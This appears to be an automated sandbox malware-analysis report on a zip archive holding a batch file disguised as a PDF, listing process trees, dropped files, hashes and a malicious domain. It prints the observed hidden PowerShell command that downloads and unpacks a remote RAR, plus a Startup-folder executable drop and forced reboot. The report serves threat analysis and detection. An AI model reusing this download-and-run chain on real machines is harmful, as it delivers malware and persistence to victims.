File name: | Denuncia_Activa_2019.zip |
Full analysis: | https://app.any.run/tasks/a9f3deef-6404-47e7-b15e-fee074dc2738 |
Verdict: | Malicious activity |
Analysis date: | March 21, 2019, 21:25:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip multi-volume archive data, at least PKZIP v2.50 to extract |
MD5: | 32115E0D6B6EB32518DEFD936B25F97D |
SHA1: | 00C39BD8127C763F471728FF477EF1B48FC35ACB |
SHA256: | 35998E3024D31203BC55D15AC9AFEA81F77E6F5D463D982BBDE9523CB9DF5644 |
SSDEEP: | 24:ZghpegV86FZn94+6bDu/1e9IPB3eAMxwu3+rze/UGWvnZzeMOhp2cl:ZspeA5FZnkbDC53e7O28G6n2pJ |
.zip | | | ZIP compressed archive (multivolume) (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1052 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Denuncia_Activa_2019.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
928 | cmd /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIa1052.3928\__Denuncia_Activa_CL.PDF.bat" " | C:\Windows\system32\cmd.exe | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 9009 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2240 | C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\Rar$DIa1052.3928\__Denuncia_Activa_CL.PDF.bat" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3980 | PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('https://www.triosalud.cl/wp/wp-content/uploads/2019/02/denuncias.rar','C:\Users\admin\Downloads\pmlgko0Qt.rar'); $Shell = New-Object -Com Shell.Application; $Zip = $Shell.NameSpace('C:\Users\admin\Downloads'); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
688 | "C:\Program Files\WinRAR\winRar.exe" x -y -c "C:\Users\admin\Downloads\pmlgko0Qt.rar" "C:\Users\admin\Downloads" | C:\Program Files\WinRAR\WinRAR.exe | cmd.exe | |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
4044 | ping 127.0.0.1 -n 1 | C:\Windows\system32\PING.EXE | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1908 | shutdown -r | C:\Windows\system32\shutdown.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Shutdown and Annotation Tool Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9HB5J59QK7DNJ7FLFM2A.temp | — | |
MD5:— | SHA256:— | |||
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
1052 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa1052.3928\__Denuncia_Activa_CL.PDF.bat | text | |
MD5:1E541B14B531BCAC70E77A012B0F0F7F | SHA256:9008B75AC8BBAACBDA0DC47BB7D631F1C791CB346CC6F6A911E7993DA0834C09 | |||
3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfbb96.TMP | binary | |
MD5:7100C9D54A32DFE02751A9E1BC41F804 | SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C | |||
688 | WinRAR.exe | C:\Users\admin\AppData\Local\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe | executable | |
MD5:410B77D8F1CDC76C867B4A6A27AE55E5 | SHA256:421448D92A6D871B218673025D4E4E121E263262F0CB5CD51E30853E2F8F04D7 | |||
3980 | powershell.exe | C:\Users\admin\Downloads\pmlgko0Qt.rar | compressed | |
MD5:AAFB4D8EBF63B50D80DAFF778226F7BC | SHA256:B5A84E8079DC8558D3960D711D8591500B69CF79E750ECAF88919E398C59383F | |||
688 | WinRAR.exe | C:\Users\admin\Downloads\hello.txt | text | |
MD5:49C5DDEBFDC0862208A6859B757DBB81 | SHA256:3C304DFF4CFAD593CE554D39EA6EA589B5E20A7831924CE0BD83539498C8E34D | |||
688 | WinRAR.exe | C:\Users\admin\Downloads\world.txt | text | |
MD5:6E0D9920A8BA481D13EEB355147B13F3 | SHA256:ED428CE14DC2EE5FCDEB3AD11E8DC315858F73BE187A4B072246B1B8662030A2 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3980 | powershell.exe | 190.107.177.246:443 | www.triosalud.cl | Gtd Internet S.A. | CL | malicious |
Domain | IP | Reputation |
---|---|---|
www.triosalud.cl |
| malicious |